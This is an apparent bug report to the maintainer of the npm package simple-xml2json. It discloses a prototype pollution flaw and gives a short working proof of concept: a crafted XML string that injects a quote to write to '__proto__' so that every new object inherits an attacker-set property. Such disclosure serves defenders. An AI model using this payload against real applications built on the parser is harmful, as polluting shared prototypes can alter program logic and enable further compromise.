Security risk: Prototype pollution #4
Description
Hello, I found a vulnerability in your package, the thing is that there is no encoding ", so it is possible to rewrite the prototype of the object.
Steps to reproduce:
- Install you package from npm
- write into code file smth like:
var xml2json = require("simple-xml2json");
var xml = '<".__proto__.__proto__.slonser="PWNED"+"></__proto__>';
var json = xml2json.parser(xml);
var a = {}
console.log(a.slonser)
- Result: pwned